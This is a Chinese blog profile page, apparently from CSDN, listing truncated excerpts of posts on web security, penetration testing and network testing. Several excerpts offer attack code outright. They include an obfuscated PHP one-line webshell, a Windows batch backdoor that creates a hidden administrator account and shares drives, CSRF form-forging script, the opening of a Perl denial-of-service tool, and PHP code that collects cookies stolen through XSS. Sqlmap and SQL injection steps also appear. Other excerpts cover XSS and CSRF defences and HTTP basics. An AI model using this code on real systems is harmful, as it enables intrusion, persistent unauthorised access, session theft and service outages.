自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 资源 (1)
  • 收藏
  • 关注

原创 测试的那些事————测试底层DPDK线程处理性能注意事项

1,配置为1网卡多队列时,由于队列是按IP分配,所以发包时采用tcpreplay-edit --unique-ip 参数,保证源/目的IP随机性,这样每个接收队列分配处理到均匀的流量,不仅使模拟流量更接近真实环境流量,同样的 处理性能也最优最真实。...

2019-01-03 11:21:47 452

原创 Python爬虫学习篇——————网络爬虫用到的库

抓取用到的python自带模块:urllib、urllib2、requests、httplib2等Requests:import?requestsresponse?=?requests.get(url)content?=?requests.get(url).contentprint "response?headers:", response.headersprint "co

2017-04-10 16:20:04 3155 1

原创 代码篇——————一句话木马

ASP系列      (密码是-7)  PHP系列      @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*

2017-04-05 17:40:18 2338 1

原创 代码篇——————windows后门代码

@echo off     @net user zzunble zzunble.net /add@net localgroup administrators zzunble /add@net share c$=c:@net share d$=d:@net share e$=e:@net share f$=f:@echo 3>c:\windows\system32\t1.

2017-03-21 12:33:38 936

原创 CSRF攻击代码

This page forges an HTTP POST request.      function post(url,fields)  {  //create a element.  var p = document.createElement("form");  //construct the form  p.action = url;  p.inne

2017-03-13 17:47:43 847

转载 利用perl脚本执行拒绝攻击的代码

#!/usr/bin/perl -wuse strict;use IO::Socket::INET;use IO::Socket::SSL;use Getopt::Long;use Config;$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errorsprint CCCCCCCCCCOOCCOOOOO88

2017-03-13 10:40:08 1814

原创 接收cookie代码与注入盗取cookie代码参考

document.write('');alert(/XSS/)$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间$referer=

2017-03-13 10:34:53 2096

原创 实例演示——————简单演示XSS store攻击,便于学习理解XSS store

此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。一,环境搭建     1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。     2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者

2017-03-09 11:16:41 2258

原创 搜索的艺术————黑客语法

谷歌黑客语法:搜索也是一门艺术intitle:搜索网页标题中包含有特殊字符的网页。如:intitle:cbiinurl:搜索包含有特定字符的URLintext:搜索网页正文内容中的指定字符。intext:to parent directoryFiletype:搜索指定类型的文件Site:找到与指定网站有关联的URL语法组合,威力加倍,成功率更高。Site:目标网

2017-01-17 09:52:33 580

原创 web安全————PHP安全之文件包含漏洞

PHP安全问题    PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。    文件包含漏洞:    文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,并让服务器端执行。代码注入的典型代表就是文件包含(file inclusion).这种文件包含漏洞可能

2017-01-13 11:23:31 2405

原创 web安全————文件上传漏洞

文件上传漏洞       所谓的文件上传漏洞是指用户上传了一个可执行脚本,并通过脚本文件获得执行服务器端命令的能力。文件上传本身是没有问题的,它只是一种正常的业务需求,问题出在文件上传后服务器怎么处理、解释文件。文件上传后导致常见的安全问题一般包括:       1,上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码被执行       2,上传文件是f

2016-12-28 10:42:16 923

原创 web安全————注入(初识篇)

注入攻击       注入攻击是web安全领域中最常见的一种攻击方式。注入攻击的本质就是把用户输入的数据当作代码执行,主要的两个关键条件:第一是用户能够控制输入,第二是原本程序要执行的代码拼接了用户输入的数据。在注入中,常见的就是SQL,下面我们来看看SQL注入的一些方法、技巧以及防御。       SQL注入       请看一个典型的SQL注入例子:       var

2016-12-22 10:00:11 4646

原创 web安全————clickjacking(点击劫持)

点击劫持(clickjacking)      点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击在

2016-12-14 09:18:44 7371

原创 web安全————CSRF(防御篇)

CSRF防御之验证码     目前,验证码被认为是对抗CSRF攻击最简单有效的防御措施。用到验证码就是在请求过程中强制用户与应用进行交互,但是一个站点、一个好的产品要考虑到用户的体验,显然如果在所有的操作上都加入验证码对用户来说就很不友好。因此验证码只能是一种防御CSRF攻击的辅助手段,并不能成为主要解决方案。     CSRF攻击之Referer check     一个站点

2016-12-08 10:18:04 882

原创 web安全————CSRF(攻击篇)

跨站请求伪造(CSRF)     首先先来看一个实例:当用户在某个论坛上删除某篇文章时,通过抓包获取请求如下:     http://blog.sohu.com/manage/entry.do?m=delete&id=12345678。用户登录后cookie为有效状态下,服务器接受到上述请求将会当作一次更新操作执行。为了完成CSFR攻击,攻击者需要构造一个页面:http://www.a.c

2016-12-07 11:04:57 906

原创 web安全————XSS(预防篇)

现在市面浏览器都对XSS做了一些防范措施,如firefox的CSP、Noscrip扩展和IE8内置的XSS Filter等等。但是对于一个站点来说,这往往是不够的,还需要做出更优秀更好的方案防止XSS攻击。如httponly、输入检查、输出检查等等。     httponly是由微软提出来的,目前很多浏览器都支持该功能。带有httponly标识将禁止javascript访问cookie

2016-12-01 10:47:17 507

原创 web安全————XSS(攻击篇)

所谓的跨站脚本攻击(XSS)是指攻击者通过“HTML注入”,从而对客户端的网页进行篡改,并且插入恶意代码(脚本),使用户在浏览网页时控制用户浏览器的一种攻击。因此XSS也成为了客户端的头号大敌,OWASP也因此多次把XSS列在TOP 10威胁的榜首。

2016-11-27 12:44:14 3208

原创 web————针对web的攻击技术

在分析针对web的攻击前,先要明白http协议本身是不存在安全性问题的,就是说攻击者不会把它当作攻击的对象。而是应用了http协议的服务器或者客户端、以及运行在服务器的web应用资源才是攻击的目标。        针对web应用的攻击,主要分为主动攻击和被动攻击两种攻击模式              主动攻击:攻击者访问web应用,直接将攻击代码传入的攻击模式(要求攻击者必须有访问该资源的

2016-11-20 12:30:34 792

原创 web————http(认证篇)

HTTP/1.1认证方式有如下几种:1,BASIC认证(基本认证)2,DIGEST认证(摘要认证)3,SSL客户端认证4,FORMBASE认证(基于表单认证)BASIC认证:basic认证是在HTTP/1.0版本就定义的,目前由于它的不灵活性、达不到服务端所要求的安全等级、且如果再一次进行认证时它根本无法进行注销,因此该认证并不常用。下面看看它的实现过程:1,客户端

2016-11-18 09:41:14 409

原创 web————https(详解篇)

由于互联网的快速发展,网络的攻防技术在不断的更新,http协议也愈发不安全,其缺点主要表现为:通信使用明文(不加密),内容可能会被攻击者窃听不验证通信双方的身份,因此攻击者有可能伪装为任何一方完成攻击无法证明报文的完整性,信息在通信过程中有可能已遭攻击者篡改        这不仅仅在http出现,很多的未加密协议也有类似问题。因此,加密技术就引入到数据传

2016-11-17 21:56:46 687

原创 web————http(报文详解篇)

http报文首部:报文首部——————————在客户端与服务端处理时,重要信息几乎都在这里空行(CR+LF)报文主题——————————所需要的用户和资源信息都在这里http请求报文中包含:报文请求的方法、url、http版本、http首部字段等。如:GET / HTTP/1.1Host: hackr.jpUser-Agent: Mozilla/5.0 (Win

2016-11-16 11:40:06 1782

原创 渗透————偏移注入

偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。            偏移注入的流程:                 1,判断字段数。例如:order by 猜字段数为22                 2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)       

2016-11-16 10:34:05 2006

原创 web————http协议(初识篇)

初识状态码,通常浏览器访问web服务器时,服务器的response会夹带有状态码,状态码有三位数字组成,第一个数字定义了响应的类别,且有五种可能的取值:                1XX:指示信息————表示请求已经接受,继续处理                2XX:成功——————表示请求已被成功接收、理解、接受    (200 成功)                3

2016-11-15 23:02:00 478

原创 渗透————burpsuite(基础熟悉篇)

burpsuite是java语言编写的一款强大的综合工具,支持在线拦包、分析包、编码、提交、扫描等一系列功能鱼一身的软件。安装burpsuite时,本机要有jdk环境,burpsuit需要开启代理。            target————爬行地图(site map)            proxy————代理设置及开关            spider————爬行   

2016-11-15 22:22:23 4030

原创 Linux内核高性能测试工具pktgen的简单使用

为什么用pktgen进行性能测试?有时候需要对某个网卡或是设备进行性能测试,但是专业的测试仪还是比较昂贵的,此时只需要有一台Linux系统的服务器便可满足需求。关于pktgen的废话我就不多说,以下谈谈本人用pktgen对设备进行性能测试步骤,仅供新手参考,相互学习。准备工作:1,搭建测试环境。pktgen(接口1)————被测设备————(接口2)pktgen2,如果Linux中

2016-11-14 09:37:48 3527

原创 渗透————sqlmap

sqlmap使用(access):                sqlmap.py  -u 目标地址                 sqlmap.py  -u 目标地址 --tables    //猜解表名  afmin                sqlmap.py  -u 目标地址 --colums -T admin                sqlmap.p

2016-11-13 13:15:33 424

原创 渗透————PHP+MYSQL数据库(下)

PHP+MYSQL的web,在5.0版本后注入有所不一样,由于5.0以后的版本自带information_schema.tables数据库,因此相较5.0之前注入简单。在上篇文章简要说明了注入技巧,也有提到过不同权限的注入,本文简要说明root权限及其更高权限下的注入。          1,在收集信息阶段,注入use(),爆出当前用户为root时,有两种方法进行入侵:          

2016-11-12 15:58:13 537

原创 渗透————PHP+MYSQL数据库(上)

SQL简单命令:        mysql -u username -ppassword -h ip   //进入MYSQL数据库        show database;  //查看数据库有哪些文件        select version();  //查看数据库版本        use admin;     //选择admin数据库        show table

2016-11-12 15:07:44 1002

py打包exe工具.rar

打包成.exe,命令简单粗暴,不论男女老少、小孩中老年,都可以简单实现,只需要windows自带cmd命令即可

2020-09-07

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除